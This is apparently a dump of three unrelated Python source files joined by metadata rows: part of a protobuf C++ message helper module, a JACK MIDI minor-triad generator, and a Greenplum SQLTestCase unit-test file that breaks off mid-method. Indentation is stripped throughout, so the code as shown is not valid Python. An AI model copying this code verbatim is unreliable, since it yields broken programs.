# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains helper functions used to create protocol message classes from
Descriptor objects at runtime backed by the protocol buffer C++ API.
"""
__author__ = '[email protected] (Petar Petrov)'
import copyreg
import operator
from google.protobuf.internal import _net_proto2___python
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import message
import collections
_LABEL_REPEATED = _net_proto2___python.LABEL_REPEATED
_LABEL_OPTIONAL = _net_proto2___python.LABEL_OPTIONAL
_CPPTYPE_MESSAGE = _net_proto2___python.CPPTYPE_MESSAGE
_TYPE_MESSAGE = _net_proto2___python.TYPE_MESSAGE
def GetDescriptorPool():
"""Creates a new DescriptorPool C++ object."""
return _net_proto2___python.NewCDescriptorPool()
_pool = GetDescriptorPool()
def GetFieldDescriptor(full_field_name):
"""Searches for a field descriptor given a full field name."""
return _pool.FindFieldByName(full_field_name)
def BuildFile(content):
"""Registers a new proto file in the underlying C++ descriptor pool."""
_net_proto2___python.BuildFile(content)
def GetExtensionDescriptor(full_extension_name):
"""Searches for extension descriptor given a full field name."""
return _pool.FindExtensionByName(full_extension_name)
def NewCMessage(full_message_name):
"""Creates a new C++ protocol message by its name."""
return _net_proto2___python.NewCMessage(full_message_name)
def ScalarProperty(cdescriptor):
"""Returns a scalar property for the given descriptor."""
def Getter(self):
return self._cmsg.GetScalar(cdescriptor)
def Setter(self, value):
self._cmsg.SetScalar(cdescriptor, value)
return property(Getter, Setter)
def CompositeProperty(cdescriptor, message_type):
"""Returns a Python property the given composite field."""
def Getter(self):
sub_message = self._composite_fields.get(cdescriptor.name, None)
if sub_message is None:
cmessage = self._cmsg.NewSubMessage(cdescriptor)
sub_message = message_type._concrete_class(__cmessage=cmessage)
self._composite_fields[cdescriptor.name] = sub_message
return sub_message
return property(Getter)
class RepeatedScalarContainer(object):
"""Container for repeated scalar fields."""
__slots__ = ['_message', '_cfield_descriptor', '_cmsg']
def __init__(self, msg, cfield_descriptor):
self._message = msg
self._cmsg = msg._cmsg
self._cfield_descriptor = cfield_descriptor
def append(self, value):
self._cmsg.AddRepeatedScalar(
self._cfield_descriptor, value)
def extend(self, sequence):
for element in sequence:
self.append(element)
def insert(self, key, value):
values = self[slice(None, None, None)]
values.insert(key, value)
self._cmsg.AssignRepeatedScalar(self._cfield_descriptor, values)
def remove(self, value):
values = self[slice(None, None, None)]
values.remove(value)
self._cmsg.AssignRepeatedScalar(self._cfield_descriptor, values)
def __setitem__(self, key, value):
values = self[slice(None, None, None)]
values[key] = value
self._cmsg.AssignRepeatedScalar(self._cfield_descriptor, values)
def __getitem__(self, key):
return self._cmsg.GetRepeatedScalar(self._cfield_descriptor, key)
def __delitem__(self, key):
self._cmsg.DeleteRepeatedField(self._cfield_descriptor, key)
def __len__(self):
return len(self[slice(None, None, None)])
def __eq__(self, other):
if self is other:
return True
if not isinstance(other, collections.Sequence):
raise TypeError(
'Can only compare repeated scalar fields against sequences.')
# We are presumably comparing against some other sequence type.
return other == self[slice(None, None, None)]
def __ne__(self, other):
return not self == other
def __hash__(self):
raise TypeError('unhashable object')
def sort(self, *args, **kwargs):
# Maintain compatibility with the previous interface.
if 'sort_function' in kwargs:
kwargs['cmp'] = kwargs.pop('sort_function')
self._cmsg.AssignRepeatedScalar(self._cfield_descriptor,
sorted(self, *args, **kwargs))
def RepeatedScalarProperty(cdescriptor):
"""Returns a Python property the given repeated scalar field."""
def Getter(self):
container = self._composite_fields.get(cdescriptor.name, None)
if container is None:
container = RepeatedScalarContainer(self, cdescriptor)
self._composite_fields[cdescriptor.name] = container
return container
def Setter(self, new_value):
raise AttributeError('Assignment not allowed to repeated field '
'"%s" in protocol message object.' % cdescriptor.name)
doc = 'Magic attribute generated for "%s" proto field.' % cdescriptor.name
return property(Getter, Setter, doc=doc)
class RepeatedCompositeContainer(object):
"""Container for repeated composite fields."""
__slots__ = ['_message', '_subclass', '_cfield_descriptor', '_cmsg']
def __init__(self, msg, cfield_descriptor, subclass):
self._message = msg
self._cmsg = msg._cmsg
self._subclass = subclass
self._cfield_descriptor = cfield_descriptor
def add(self, **kwargs):
cmessage = self._cmsg.AddMessage(self._cfield_descriptor)
return self._subclass(__cmessage=cmessage, __owner=self._message, **kwargs)
def extend(self, elem_seq):
"""Extends by appending the given sequence of elements of the same type
as this one, copying each individual message.
"""
for message in elem_seq:
self.add().MergeFrom(message)
def remove(self, value):
# TODO(protocol-devel): This is inefficient as it needs to generate a
# message pointer for each message only to do index(). Move this to a C++
# extension function.
self.__delitem__(self[slice(None, None, None)].index(value))
def MergeFrom(self, other):
for message in other[:]:
self.add().MergeFrom(message)
def __getitem__(self, key):
cmessages = self._cmsg.GetRepeatedMessage(
self._cfield_descriptor, key)
subclass = self._subclass
if not isinstance(cmessages, list):
return subclass(__cmessage=cmessages, __owner=self._message)
return [subclass(__cmessage=m, __owner=self._message) for m in cmessages]
def __delitem__(self, key):
self._cmsg.DeleteRepeatedField(
self._cfield_descriptor, key)
def __len__(self):
return self._cmsg.FieldLength(self._cfield_descriptor)
def __eq__(self, other):
"""Compares the current instance with another one."""
if self is other:
return True
if not isinstance(other, self.__class__):
raise TypeError('Can only compare repeated composite fields against '
'other repeated composite fields.')
messages = self[slice(None, None, None)]
other_messages = other[slice(None, None, None)]
return messages == other_messages
def __hash__(self):
raise TypeError('unhashable object')
def sort(self, cmp=None, key=None, reverse=False, **kwargs):
# Maintain compatibility with the old interface.
if cmp is None and 'sort_function' in kwargs:
cmp = kwargs.pop('sort_function')
# The cmp function, if provided, is passed the results of the key function,
# so we only need to wrap one of them.
if key is None:
index_key = self.__getitem__
else:
index_key = lambda i: key(self[i])
# Sort the list of current indexes by the underlying object.
indexes = list(range(len(self)))
indexes.sort(cmp=cmp, key=index_key, reverse=reverse)
# Apply the transposition.
for dest, src in enumerate(indexes):
if dest == src:
continue
self._cmsg.SwapRepeatedFieldElements(self._cfield_descriptor, dest, src)
# Don't swap the same value twice.
indexes[src] = src
def RepeatedCompositeProperty(cdescriptor, message_type):
"""Returns a Python property for the given repeated composite field."""
def Getter(self):
container = self._composite_fields.get(cdescriptor.name, None)
if container is None:
container = RepeatedCompositeContainer(
self, cdescriptor, message_type._concrete_class)
self._composite_fields[cdescriptor.name] = container
return container
def Setter(self, new_value):
raise AttributeError('Assignment not allowed to repeated field '
'"%s" in protocol message object.' % cdescriptor.name)
doc = 'Magic attribute generated for "%s" proto field.' % cdescriptor.name
return property(Getter, Setter, doc=doc)
class ExtensionDict(object):
"""Extension dictionary added to each protocol message."""
def __init__(self, msg):
self._message = msg
self._cmsg = msg._cmsg
self._values = {}
def __setitem__(self, extension, value):
from google.protobuf import descriptor
if not isinstance(extension, descriptor.FieldDescriptor):
raise KeyError('Bad extension %r.' % (extension,))
cdescriptor = extension._cdescriptor
if (cdescriptor.label != _LABEL_OPTIONAL or
cdescriptor.cpp_type == _CPPTYPE_MESSAGE):
raise TypeError('Extension %r is repeated and/or a composite type.' % (
extension.full_name,))
self._cmsg.SetScalar(cdescriptor, value)
self._values[extension] = value
def __getitem__(self, extension):
from google.protobuf import descriptor
if not isinstance(extension, descriptor.FieldDescriptor):
raise KeyError('Bad extension %r.' % (extension,))
cdescriptor = extension._cdescriptor
if (cdescriptor.label != _LABEL_REPEATED and
cdescriptor.cpp_type != _CPPTYPE_MESSAGE):
return self._cmsg.GetScalar(cdescriptor)
ext = self._values.get(extension, None)
if ext is not None:
return ext
ext = self._CreateNewHandle(extension)
self._values[extension] = ext
return ext
def ClearExtension(self, extension):
from google.protobuf import descriptor
if not isinstance(extension, descriptor.FieldDescriptor):
raise KeyError('Bad extension %r.' % (extension,))
self._cmsg.ClearFieldByDescriptor(extension._cdescriptor)
if extension in self._values:
del self._values[extension]
def HasExtension(self, extension):
from google.protobuf import descriptor
if not isinstance(extension, descriptor.FieldDescriptor):
raise KeyError('Bad extension %r.' % (extension,))
return self._cmsg.HasFieldByDescriptor(extension._cdescriptor)
def _FindExtensionByName(self, name):
"""Tries to find a known extension with the specified name.
Args:
name: Extension full name.
Returns:
Extension field descriptor.
"""
return self._message._extensions_by_name.get(name, None)
def _CreateNewHandle(self, extension):
cdescriptor = extension._cdescriptor
if (cdescriptor.label != _LABEL_REPEATED and
cdescriptor.cpp_type == _CPPTYPE_MESSAGE):
cmessage = self._cmsg.NewSubMessage(cdescriptor)
return extension.message_type._concrete_class(__cmessage=cmessage)
if cdescriptor.label == _LABEL_REPEATED:
if cdescriptor.cpp_type == _CPPTYPE_MESSAGE:
return RepeatedCompositeContainer(
self._message, cdescriptor, extension.message_type._concrete_class)
else:
return RepeatedScalarContainer(self._message, cdescriptor)
# This shouldn't happen!
assert False
return None
def NewMessage(bases, message_descriptor, dictionary):
"""Creates a new protocol message *class*."""
_AddClassAttributesForNestedExtensions(message_descriptor, dictionary)
_AddEnumValues(message_descriptor, dictionary)
_AddDescriptors(message_descriptor, dictionary)
return bases
def InitMessage(message_descriptor, cls):
"""Constructs a new message instance (called before instance's __init__)."""
cls._extensions_by_name = {}
_AddInitMethod(message_descriptor, cls)
_AddMessageMethods(message_descriptor, cls)
_AddPropertiesForExtensions(message_descriptor, cls)
copyreg.pickle(cls, lambda obj: (cls, (), obj.__getstate__()))
def _AddDescriptors(message_descriptor, dictionary):
"""Sets up a new protocol message class dictionary.
Args:
message_descriptor: A Descriptor instance describing this message type.
dictionary: Class dictionary to which we'll add a '__slots__' entry.
"""
dictionary['__descriptors'] = {}
for field in message_descriptor.fields:
dictionary['__descriptors'][field.name] = GetFieldDescriptor(
field.full_name)
dictionary['__slots__'] = list(dictionary['__descriptors'].keys()) + [
'_cmsg', '_owner', '_composite_fields', 'Extensions', '_HACK_REFCOUNTS']
def _AddEnumValues(message_descriptor, dictionary):
"""Sets class-level attributes for all enum fields defined in this message.
Args:
message_descriptor: Descriptor object for this message type.
dictionary: Class dictionary that should be populated.
"""
for enum_type in message_descriptor.enum_types:
dictionary[enum_type.name] = enum_type_wrapper.EnumTypeWrapper(enum_type)
for enum_value in enum_type.values:
dictionary[enum_value.name] = enum_value.number
def _AddClassAttributesForNestedExtensions(message_descriptor, dictionary):
"""Adds class attributes for the nested extensions."""
extension_dict = message_descriptor.extensions_by_name
for extension_name, extension_field in list(extension_dict.items()):
assert extension_name not in dictionary
dictionary[extension_name] = extension_field
def _AddInitMethod(message_descriptor, cls):
"""Adds an __init__ method to cls."""
# Create and attach message field properties to the message class.
# This can be done just once per message class, since property setters and
# getters are passed the message instance.
# This makes message instantiation extremely fast, and at the same time it
# doesn't require the creation of property objects for each message instance,
# which saves a lot of memory.
for field in message_descriptor.fields:
field_cdescriptor = cls.__descriptors[field.name]
if field.label == _LABEL_REPEATED:
if field.cpp_type == _CPPTYPE_MESSAGE:
value = RepeatedCompositeProperty(field_cdescriptor, field.message_type)
else:
value = RepeatedScalarProperty(field_cdescriptor)
elif field.cpp_type == _CPPTYPE_MESSAGE:
value = CompositeProperty(field_cdescriptor, field.message_type)
else:
value = ScalarProperty(field_cdescriptor)
setattr(cls, field.name, value)
# Attach a constant with the field number.
constant_name = field.name.upper() + '_FIELD_NUMBER'
setattr(cls, constant_name, field.number)
def Init(self, **kwargs):
"""Message constructor."""
cmessage = kwargs.pop('__cmessage', None)
if cmessage:
self._cmsg = cmessage
else:
self._cmsg = NewCMessage(message_descriptor.full_name)
# Keep a reference to the owner, as the owner keeps a reference to the
# underlying protocol buffer message.
owner = kwargs.pop('__owner', None)
if owner:
self._owner = owner
if message_descriptor.is_extendable:
self.Extensions = ExtensionDict(self)
else:
# Reference counting in the C++ code is broken and depends on
# the Extensions reference to keep this object alive during unit
# tests (see b/4856052). Remove this once b/4945904 is fixed.
self._HACK_REFCOUNTS = self
self._composite_fields = {}
for field_name, field_value in list(kwargs.items()):
field_cdescriptor = self.__descriptors.get(field_name, None)
if not field_cdescriptor:
raise ValueError('Protocol message has no "%s" field.' % field_name)
if field_cdescriptor.label == _LABEL_REPEATED:
if field_cdescriptor.cpp_type == _CPPTYPE_MESSAGE:
field_name = getattr(self, field_name)
for val in field_value:
field_name.add().MergeFrom(val)
else:
getattr(self, field_name).extend(field_value)
elif field_cdescriptor.cpp_type == _CPPTYPE_MESSAGE:
getattr(self, field_name).MergeFrom(field_value)
else:
setattr(self, field_name, field_value)
Init.__module__ = None
Init.__doc__ = None
cls.__init__ = Init
def _IsMessageSetExtension(field):
"""Checks if a field is a message set extension."""
return (field.is_extension and
field.containing_type.has_options and
field.containing_type.GetOptions().message_set_wire_format and
field.type == _TYPE_MESSAGE and
field.message_type == field.extension_scope and
field.label == _LABEL_OPTIONAL)
def _AddMessageMethods(message_descriptor, cls):
"""Adds the methods to a protocol message class."""
if message_descriptor.is_extendable:
def ClearExtension(self, extension):
self.Extensions.ClearExtension(extension)
def HasExtension(self, extension):
return self.Extensions.HasExtension(extension)
def HasField(self, field_name):
return self._cmsg.HasField(field_name)
def ClearField(self, field_name):
child_cmessage = None
if field_name in self._composite_fields:
child_field = self._composite_fields[field_name]
del self._composite_fields[field_name]
child_cdescriptor = self.__descriptors[field_name]
# TODO(anuraag): Support clearing repeated message fields as well.
if (child_cdescriptor.label != _LABEL_REPEATED and
child_cdescriptor.cpp_type == _CPPTYPE_MESSAGE):
child_field._owner = None
child_cmessage = child_field._cmsg
if child_cmessage is not None:
self._cmsg.ClearField(field_name, child_cmessage)
else:
self._cmsg.ClearField(field_name)
def Clear(self):
cmessages_to_release = []
for field_name, child_field in list(self._composite_fields.items()):
child_cdescriptor = self.__descriptors[field_name]
# TODO(anuraag): Support clearing repeated message fields as well.
if (child_cdescriptor.label != _LABEL_REPEATED and
child_cdescriptor.cpp_type == _CPPTYPE_MESSAGE):
child_field._owner = None
cmessages_to_release.append((child_cdescriptor, child_field._cmsg))
self._composite_fields.clear()
self._cmsg.Clear(cmessages_to_release)
def IsInitialized(self, errors=None):
if self._cmsg.IsInitialized():
return True
if errors is not None:
errors.extend(self.FindInitializationErrors());
return False
def SerializeToString(self):
if not self.IsInitialized():
raise message.EncodeError(
'Message %s is missing required fields: %s' % (
self._cmsg.full_name, ','.join(self.FindInitializationErrors())))
return self._cmsg.SerializeToString()
def SerializePartialToString(self):
return self._cmsg.SerializePartialToString()
def ParseFromString(self, serialized):
self.Clear()
self.MergeFromString(serialized)
def MergeFromString(self, serialized):
byte_size = self._cmsg.MergeFromString(serialized)
if byte_size < 0:
raise message.DecodeError('Unable to merge from string.')
return byte_size
def MergeFrom(self, msg):
if not isinstance(msg, cls):
raise TypeError(
"Parameter to MergeFrom() must be instance of same class: "
"expected %s got %s." % (cls.__name__, type(msg).__name__))
self._cmsg.MergeFrom(msg._cmsg)
def CopyFrom(self, msg):
self._cmsg.CopyFrom(msg._cmsg)
def ByteSize(self):
return self._cmsg.ByteSize()
def SetInParent(self):
return self._cmsg.SetInParent()
def ListFields(self):
all_fields = []
field_list = self._cmsg.ListFields()
fields_by_name = cls.DESCRIPTOR.fields_by_name
for is_extension, field_name in field_list:
if is_extension:
extension = cls._extensions_by_name[field_name]
all_fields.append((extension, self.Extensions[extension]))
else:
field_descriptor = fields_by_name[field_name]
all_fields.append(
(field_descriptor, getattr(self, field_name)))
all_fields.sort(key=lambda item: item[0].number)
return all_fields
def FindInitializationErrors(self):
return self._cmsg.FindInitializationErrors()
def __str__(self):
return str(self._cmsg)
def __eq__(self, other):
if self is other:
return True
if not isinstance(other, self.__class__):
return False
return self.ListFields() == other.ListFields()
def __ne__(self, other):
return not self == other
def __hash__(self):
raise TypeError('unhashable object')
def __unicode__(self):
# Lazy import to prevent circular import when text_format imports this file.
from google.protobuf import text_format
return text_format.MessageToString(self, as_utf8=True).decode('utf-8')
# Attach the local methods to the message class.
for key, value in list(locals().copy().items()):
if key not in ('key', 'value', '__builtins__', '__name__', '__doc__'):
setattr(cls, key, value)
# Static methods:
def RegisterExtension(extension_handle):
extension_handle.containing_type = cls.DESCRIPTOR
cls._extensions_by_name[extension_handle.full_name] = extension_handle
if _IsMessageSetExtension(extension_handle):
# MessageSet extension. Also register under type name.
cls._extensions_by_name[
extension_handle.message_type.full_name] = extension_handle
cls.RegisterExtension = staticmethod(RegisterExtension)
def FromString(string):
msg = cls()
msg.MergeFromString(string)
return msg
cls.FromString = staticmethod(FromString)
def _AddPropertiesForExtensions(message_descriptor, cls):
"""Adds properties for all fields in this protocol message type."""
extension_dict = message_descriptor.extensions_by_name
for extension_name, extension_field in list(extension_dict.items()):
constant_name = extension_name.upper() + '_FIELD_NUMBER'
setattr(cls, constant_name, extension_field.number)
| mit | -264,181,149,115,612,030 | 34.493976 | 80 | 0.697217 | false |
spatialaudio/jackclient-python | examples/midi_chords.py | 1 | 1118 | #!/usr/bin/env python3
"""JACK client that creates minor triads from single MIDI notes.
All MIDI events are passed through.
Two additional events are created for each NoteOn and NoteOff event.
"""
import jack
import struct
# First 4 bits of status byte:
NOTEON = 0x9
NOTEOFF = 0x8
INTERVALS = 3, 7 # minor triad
client = jack.Client('MIDI-Chord-Generator')
inport = client.midi_inports.register('input')
outport = client.midi_outports.register('output')
@client.set_process_callback
def process(frames):
outport.clear_buffer()
for offset, indata in inport.incoming_midi_events():
# Note: This may raise an exception:
outport.write_midi_event(offset, indata) # pass through
if len(indata) == 3:
status, pitch, vel = struct.unpack('3B', indata)
if status >> 4 in (NOTEON, NOTEOFF):
for i in INTERVALS:
# Note: This may raise an exception:
outport.write_midi_event(offset, (status, pitch + i, vel))
with client:
print('#' * 80)
print('press Return to quit')
print('#' * 80)
input()
| mit | -4,470,220,128,332,092,000 | 26.95 | 78 | 0.644902 | false |
yuanzhao/gpdb | src/test/tinc/tincrepo/mpp/models/regress/sql_related/regress_sql_test_case/regress_sql_test_case.py | 12 | 36052 | """
Copyright (c) 2004-Present Pivotal Software, Inc.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import tinctest
from tinctest.lib import local_path
from tinctest.runner import TINCTestRunner
from mpp.models import SQLTestCase, SQLTestCaseException
import unittest2 as unittest
import shutil
from contextlib import closing
from datetime import datetime
from StringIO import StringIO
from unittest2.runner import _WritelnDecorator
# we're testing SQLTestCase as it pertains to tinc.py (and only tinc.py)
# as such, any attempts by raw unit2 to discover and load MockSQLTestCase must be averted
@unittest.skip('mock')
class MockSQLTestCase(SQLTestCase):
"""
@description test case with metadata
@created 2012-07-05 12:00:00
@modified 2012-07-05 12:00:02
@tags orca hashagg
"""
db_name=os.getenv('USER')
def test_explicit_test_method(self):
pass
@unittest.skip('mock')
class MockSQLTestCaseGenerateAns(SQLTestCase):
"""
@description test case with metadata
@created 2012-07-05 12:00:00
@modified 2012-07-05 12:00:02
@tags orca hashagg
"""
sql_dir = 'sql_no_ans/'
generate_ans = 'yes'
def test_explicit_test_method(self):
pass
@unittest.skip('mock')
class MockSQLTestCaseForceGenerateAns(SQLTestCase):
"""
@description test case with metadata
@created 2012-07-05 12:00:00
@modified 2012-07-05 12:00:02
@tags orca hashagg
"""
sql_dir = 'sql_no_ans/'
generate_ans = 'force'
def test_explicit_test_method(self):
pass
@unittest.skip('mock')
class MockSQLTestCaseIncorrectGenerateAns(SQLTestCase):
"""
@description test case with metadata
@created 2012-07-05 12:00:00
@modified 2012-07-05 12:00:02
@tags orca hashagg
"""
# Misspelled generate_ans. Invalid value.
generate_ans = 'yess'
def test_explicit_test_method(self):
pass
@unittest.skip('mock')
class MockSQLTestCaseGpdiffNoAnsFile(SQLTestCase):
"""
@description test case with metadata
@created 2012-07-05 12:00:00
@modified 2012-07-05 12:00:02
@tags orca hashagg
"""
sql_dir = 'sql_no_ans/'
def test_explicit_test_method(self):
pass
@unittest.skip('mock')
class MockSQLTestCaseNoGpdiffNoAnsFile(SQLTestCase):
"""
@description test case with metadata
@created 2012-07-05 12:00:00
@modified 2012-07-05 12:00:02
@tags orca hashagg
@gpdiff False
"""
sql_dir = 'sql_no_ans/'
def test_explicit_test_method(self):
pass
@unittest.skip('mock')
class MockSQLTestCaseWithOptimizerOn(SQLTestCase):
"""
@description test case with metadata
@created 2012-07-05 12:00:00
@modified 2012-07-05 12:00:02
@tags orca hashagg
@optimizer_mode on
"""
db_name=os.getenv('USER')
@unittest.skip('mock')
class MockSQLTestCaseWithOptimizerOff(SQLTestCase):
"""
@description test case with metadata
@created 2012-07-05 12:00:00
@modified 2012-07-05 12:00:02
@tags orca hashagg
@optimizer_mode off
"""
db_name=os.getenv('USER')
@unittest.skip('mock')
class MockSQLTestCaseWithOptimizerBoth(SQLTestCase):
"""
@description test case with metadata
@created 2012-07-05 12:00:00
@modified 2012-07-05 12:00:02
@tags orca hashagg
@optimizer_mode both
"""
db_name=os.getenv('USER')
class SQLTestCaseTests(unittest.TestCase):
def test_run_sql_test_failure(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCase)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
# would likely have allowed us to insolate test_query02 directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCase.test_query02":
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 1)
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query02.diff')))
shutil.rmtree(test_case.get_out_dir())
def test_run_sql_test_success(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCase)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
# would likely have allowed us to insolate test_query02 directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCase.test_query03":
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
shutil.rmtree(test_case.get_out_dir())
def test_run_entire_sql_test_case(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCase)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case = None
for test_case in test_suite._tests:
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_suite.run(test_result)
# 3 sql files with ans files and 1 explicit method
self.assertEqual(test_result.testsRun, 4)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 1)
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query02.diff')))
shutil.rmtree(test_case.get_out_dir())
def test_verify_setup_teardown(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCase)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
for test_case in test_suite._tests:
test_case.__class__.__unittest_skip__ = False
if os.path.exists(local_path("output/")):
shutil.rmtree(local_path("output/"))
test_result = unittest.TestResult()
test_suite.run(test_result)
self.assertEqual(test_result.testsRun, 4)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 1)
# Verify if setup and teardown sqls were executed
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'setup.out')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'setup', 'setup1.out')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'teardown.out')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'teardown', 'teardown1.out')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_setup.out')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_teardown.out')))
def test_run_explicit_test_method(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCase)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
# would likely have allowed us to insolate test_query02 directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCase.test_explicit_test_method":
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
def test_with_local_init_file(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCase)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
# would likely have allowed us to insolate test_query02 directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCase.test_query04":
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
def test_run_no_ans_file(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCase)
# Store all test names in a list
test_case_list = []
for temp in test_suite._tests:
test_case_list.append(temp.name)
# Verify that other sql files with ans files and explicit method is in the list
self.assertTrue('MockSQLTestCase.test_explicit_test_method' in test_case_list)
self.assertTrue('MockSQLTestCase.test_query02' in test_case_list)
# Verify that test_query_no_ans_file is not there, even though the sql file is there without the ans file
self.assertTrue('MockSQLTestCase.test_query_no_ans_file' not in test_case_list)
# Verify the default value of generate_ans is no
self.assertTrue(MockSQLTestCase.generate_ans == 'no')
def test_gpdiff_no_ans_file(self):
"""
Test whether we throw an excpetion when there is no ans file for a sql file and if gpdiff is set to True
"""
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCaseGpdiffNoAnsFile)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
# would likely have allowed us to insolate test_query02 directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCaseGpdiffNoAnsFile.test_query_no_ans_file":
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
